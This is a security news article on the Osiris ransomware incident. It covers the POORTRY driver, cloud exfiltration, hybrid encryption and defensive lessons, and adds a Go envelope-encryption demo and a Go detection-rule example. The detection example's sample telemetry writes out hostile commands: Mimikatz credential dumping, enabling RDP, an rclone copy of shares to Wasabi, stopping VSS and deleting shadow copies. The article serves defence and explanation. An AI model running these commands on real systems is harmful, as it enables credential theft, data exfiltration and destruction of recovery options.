Osiris, the new ransomware threat that escalates privileges, exfiltrates to the cloud and encrypts with a hybrid cipher

Published - 5 min read

In November 2025, a large food service franchise company in South-East Asia was hit by a new ransomware family that researchers have named Osiris. Although it shares a name with an old variant related to Locky, this version has no technical connection to that 2016 malware: it is a new threat in both behavior and code, identified by the Symantec and Carbon Black (Broadcom) Threat Hunting team. To understand why this incident draws so much attention, you have to look at both the sophistication of the encryption and the chain of tools and techniques used before encryption.

One of the most striking elements of the attack was the use of a malicious driver called POORTRY. Instead of reusing a legitimate but vulnerable driver, the practice known as "bring your own vulnerable driver" (BYOVD), POORTRY appears to have been built specifically to escalate privileges and disable security solutions. This makes it easier for the attacker to kill defensive processes without depending on legitimate drivers with known flaws, a variation that complicates detection and response: there is no known-vulnerable driver hash for a blocklist to catch, so defenders have to rely on driver-load telemetry and signing policy instead. The Broadcom / Carbon Black report also notes the use of a tool called KillAV and the enabling of RDP in the compromised environment, steps that strengthen the attacker's remote control and neutralize countermeasures.


Before the encryptor ran, the intruders exfiltrated sensitive data with Rclone to a Wasabi cloud storage bucket. This pattern, exfiltration before encryption, is increasingly common: the threat is no longer only that the data becomes inaccessible through encryption, but that it can also be leaked publicly as additional pressure to pay the ransom. The attackers also used a build of Mimikatz whose executable carried the same file name (kaz.exe) observed in incidents linked to INC ransomware, which suggests possible connections between operators or reuse of tooling.

Technically, Osiris has been described as an effective and flexible encryptor. It uses a hybrid encryption scheme and generates a different key for each file, which makes recovery without the corresponding private key impractical. It can also stop specific services, select which folders and extensions to encrypt, force processes to close and drop a ransom note. By default it attempts to stop a long list of services and processes belonging to office suites, mail servers, browsers, and backup and volume shadow copy solutions, which both releases file locks so the files can be encrypted and hampers the work of recovery and continuity teams.
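To make the hybrid scheme concrete, here is an added example written for this article (it is not Osiris code and is not derived from the Broadcom report) of the envelope-encryption structure the paragraph describes: a fresh AES-256-GCM key per file, wrapped with the operator's RSA-OAEP public key so that only the matching private key can unwrap it. The key sizes, the choice of AES-GCM and OAEP, the file names and the sample contents are this example's assumptions. It shows why one recovered file key opens only its own file and why an unrelated private key opens nothing.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Envelope is one hybrid-encrypted file: the content under a per-file
// AES-256-GCM key, plus that key wrapped with the operator's RSA public key.
// The raw file key is never stored; only the wrapped copy survives.
type Envelope struct {
	WrappedKey []byte // RSA-OAEP(pub, fileKey)
	Nonce      []byte
	Ciphertext []byte // AES-GCM(fileKey, plaintext), tag included
}

// newOperatorKey stands in for the key pair the operator generates once per
// campaign; only the public half ever reaches the victim. 2048 bits is an
// assumption of this example.
func newOperatorKey() (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, 2048)
}

// newFileKey draws a fresh 256-bit key; it is called once per file, so no
// two files share a key.
func newFileKey() ([]byte, error) {
	k := make([]byte, 32)
	_, err := rand.Read(k)
	return k, err
}

// seal encrypts plaintext under fileKey with AES-GCM and wraps fileKey with
// RSA-OAEP under pub. Holding only pub is enough to produce this and not
// enough to reverse it.
func seal(pub *rsa.PublicKey, fileKey, plaintext []byte) (*Envelope, error) {
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := gcm.Seal(nil, nonce, plaintext, nil)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
	if err != nil {
		return nil, err
	}
	return &Envelope{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ct}, nil
}

// openWithKey decrypts one envelope with its raw file key, for instance a
// key a responder carved from a memory image. GCM's tag check rejects any
// other file's key, so one recovered key says nothing about other files.
func openWithKey(fileKey []byte, env *Envelope) ([]byte, error) {
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
}

// openWithPrivateKey is the decryptor path: unwrap the file key with the
// operator's private key, then decrypt. Without priv the wrapped key is opaque.
func openWithPrivateKey(priv *rsa.PrivateKey, env *Envelope) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), nil, priv, env.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	return openWithKey(fileKey, env)
}

func main() {
	priv, err := newOperatorKey()
	if err != nil {
		panic(err)
	}
	// Constructed sample contents standing in for two victim files.
	keyA, _ := newFileKey()
	keyB, _ := newFileKey()
	envA, _ := seal(&priv.PublicKey, keyA, []byte("constructed: Q3 payroll"))
	envB, _ := seal(&priv.PublicKey, keyB, []byte("constructed: supplier contracts"))
	fmt.Println("per-file keys identical:       ", bytes.Equal(keyA, keyB))
	_, err = openWithKey(keyA, envB)
	fmt.Println("file A's key opens file B:     ", err == nil)
	pt, err := openWithPrivateKey(priv, envA)
	fmt.Printf("operator key opens file A:      %v (%q)\n", err == nil, pt)
	other, _ := newOperatorKey()
	_, err = openWithPrivateKey(other, envB)
	fmt.Println("unrelated private key opens B: ", err == nil)
}
```

For a responder the practical consequences are the ones the paragraph implies: a file key carved from a memory image helps with exactly one file, and the only general recovery paths are the operator's private key, an implementation flaw in key generation or wrapping, or backups.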

The intrusion also showed heavy use of dual-use and remote management tools: from scanners and utilities for running remote commands to legitimate remote access agents, adapted or customized, such as a modified version of RustDesk. These utilities, valid in defensive hands, become attack tools when privileged operators use them to move laterally, collect credentials and deploy malicious payloads. The pattern observed in this incident (internal reconnaissance, cloud exfiltration, a driver used to disable security and, finally, deployment of the encryptor) fits well-coordinated modern attack chains.
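As an added example (not from the page's sources), the following Go program runs a handful of detection rules over constructed Sysmon-style telemetry records that mimic the chain described above and in the earlier paragraphs: a Mimikatz-style binary with the kaz.exe name, RDP enabled through the registry, Rclone pushing data to a Wasabi endpoint, a kernel driver loading from a user-writable path, a KillAV-style binary, and backup/VSS services being stopped. All file paths, service names, the telemetry format and the rule patterns are this example's assumptions, not indicators from the Broadcom report; the only external fact used is that wasabisys.com is Wasabi's public S3 domain.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding ties one telemetry record (1-based position in the input) to an
// attack stage and the rule that fired.
type Finding struct {
	Seq   int
	Stage string
	Rule  string
}

// rule tests one field of a record carrying a given Sysmon event ID
// (1 = process creation, 6 = driver load, 22 = DNS query).
type rule struct {
	stage, name, eventID, field string
	re                          *regexp.Regexp
}

// Rules for the stages described in this article. Paths, service names and
// tool names are this example's assumptions, not indicators from the report.
var rules = []rule{
	{"credential-access", "Mimikatz-style binary or sekurlsa module", "1", "CommandLine",
		regexp.MustCompile(`(?i)(\\kaz\.exe|\\mimikatz\.exe|sekurlsa::)`)},
	{"remote-access", "RDP enabled through the registry", "1", "CommandLine",
		regexp.MustCompile(`(?i)reg(\.exe)?\s+add\s+.*Terminal Server.*fDenyTSConnections.*/d\s+0`)},
	{"exfiltration", "DNS lookup of a Wasabi S3 endpoint", "22", "QueryName",
		regexp.MustCompile(`(?i)(^|\.)wasabisys\.com$`)},
	{"exfiltration", "rclone transfer to a Wasabi remote", "1", "CommandLine",
		regexp.MustCompile(`(?i)rclone(\.exe)?\s+(copy|sync|move)\s+.*(wasabi|wasabisys\.com)`)},
	{"defense-evasion", "kernel driver loaded from a user-writable path", "6", "ImageLoaded",
		regexp.MustCompile(`(?i)^C:\\(Windows\\Temp|Users|ProgramData)\\.*\.sys$`)},
	{"defense-evasion", "AV/EDR kill utility launched", "1", "Image",
		regexp.MustCompile(`(?i)\\killav[^\\]*\.exe$`)},
	{"impact-prep", "backup/VSS service stopped or shadow copies deleted", "1", "CommandLine",
		regexp.MustCompile(`(?i)((net|sc)(\.exe)?\s+stop\s+(vss|veeam|backup|sql|exchange)|vssadmin(\.exe)?\s+delete\s+shadows)`)},
}

// sampleTelemetry is constructed for this example: tab-separated key=value
// records in the order an Osiris-style intrusion would produce them.
var sampleTelemetry = []string{
	"EID=1\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=whoami /all",
	"EID=1\tImage=C:\\Users\\svc_app\\AppData\\Local\\Temp\\kaz.exe\tCommandLine=kaz.exe privilege::debug sekurlsa::logonpasswords exit",
	"EID=1\tImage=C:\\Windows\\System32\\reg.exe\tCommandLine=reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
	"EID=22\tImage=C:\\ProgramData\\rclone.exe\tQueryName=s3.wasabisys.com",
	"EID=1\tImage=C:\\ProgramData\\rclone.exe\tCommandLine=rclone.exe copy D:\\Shares\\Finance wasabi:fin-archive --transfers 16",
	"EID=6\tImageLoaded=C:\\Windows\\Temp\\drv\\kmd.sys\tSignature=<unavailable>",
	"EID=1\tImage=C:\\Windows\\Temp\\KillAV.exe\tCommandLine=KillAV.exe -all",
	"EID=1\tImage=C:\\Windows\\System32\\net.exe\tCommandLine=net stop VSS /y",
	"EID=1\tImage=C:\\Windows\\System32\\vssadmin.exe\tCommandLine=vssadmin delete shadows /all /quiet",
}

// parseRecord splits "k=v\tk=v" into a field map.
func parseRecord(line string) map[string]string {
	fields := map[string]string{}
	for _, kv := range strings.Split(line, "\t") {
		if parts := strings.SplitN(kv, "=", 2); len(parts) == 2 {
			fields[parts[0]] = parts[1]
		}
	}
	return fields
}

// triage runs every rule over every record and returns hits in input order.
func triage(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		f := parseRecord(line)
		for _, r := range rules {
			if f["EID"] == r.eventID && r.re.MatchString(f[r.field]) {
				out = append(out, Finding{Seq: i + 1, Stage: r.stage, Rule: r.name})
			}
		}
	}
	return out
}

// stageChain returns the distinct stages in order of first appearance: the
// attack chain as the telemetry shows it.
func stageChain(findings []Finding) []string {
	seen := map[string]bool{}
	var chain []string
	for _, f := range findings {
		if !seen[f.Stage] {
			seen[f.Stage] = true
			chain = append(chain, f.Stage)
		}
	}
	return chain
}

func main() {
	findings := triage(sampleTelemetry)
	for _, f := range findings {
		fmt.Printf("#%02d  %-18s %s\n", f.Seq, f.Stage, f.Rule)
	}
	fmt.Println("chain:", strings.Join(stageChain(findings), " -> "))
}
```

The point is stage coverage rather than any single rule: an environment that only alerts on the encryptor sees this incident at the last two records, while the rclone and driver-load records arrive well before it. In production these would be Sigma or EDR rules over real Sysmon events, and the driver rule would be paired with a signature check rather than a path pattern alone.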

The broader picture of 2025 shows that ransomware remains a persistent and evolving threat. The leak-site data published by extortion groups records thousands of victims, with a slight increase year on year, and well-known actors continue to operate, mutate or form alliances. Groups such as Akira, LockBit and others have shown recent tactics ranging from exploiting vulnerabilities and side-loading payloads through loaders to using vulnerable drivers to evade defenses. For a deeper look at some of these campaigns and techniques, there are detailed public analyses from companies such as Palo Alto Unit 42 on new families, and from Coveware on flawed cryptographic implementations that turn certain attacks into permanent data loss: the analysis of Sicarii, the 01flip documentation and the description of the Obscura incident, which according to Coveware caused irreversible file loss through a failure in the encryption process.


From a defensive perspective there are clear lessons. Restricting remote access and enforcing multifactor authentication are basic but effective measures, especially for services such as RDP that have been exploited repeatedly. It is just as important to monitor the use of legitimate administration and forensic tools inside the network, and to have application allowlisting policies that reduce unauthorized binary execution. Keeping off-site, immutable backups and rehearsing recovery plans also narrows the attacker's options and lets the organization recover without giving in to extortion.

Beyond the technical response, the Osiris case is a reminder that data extortion has evolved: encryption may be only one part of the coercion scheme. Data theft, public release of stolen information and the combination of cryptographic and non-cryptographic threats widen the risk for companies of every size. The usual recommendations (keeping systems updated and patched, segmenting networks, auditing permissions and telemetry, and training staff) remain the most effective way to reduce the attack surface.

For security leaders and for any organization with critical assets, this incident is a reminder of the need for a comprehensive strategy: detection and response tooling, strict access controls, tested backups and a well-rehearsed incident response capability. Threats are not merely recycled; they are reinvented with new components such as POORTRY and exfiltration chains to cloud services, so defenses must adapt at the same pace. To review the technical reports and analyses mentioned in this article, consult the report shared by Broadcom / Symantec and the public analyses of actors and campaigns in specialized sources such as Security.com / Broadcom, ReliaQuest, Unit 42 and Coveware.
